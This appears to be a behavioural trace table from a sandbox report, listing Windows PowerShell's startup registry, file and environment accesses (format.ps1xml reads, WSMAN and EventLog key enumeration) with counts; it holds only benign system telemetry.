| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
5 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 4096 |
|
17 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 3022 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 50, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 281 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 4096 |
|
62 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 3895 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 201, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 4096 |
|
21 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 3687 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 409, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 4096 |
|
4 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 2228 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 844, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 4096 |
|
4 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 3736 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 360, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
7 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
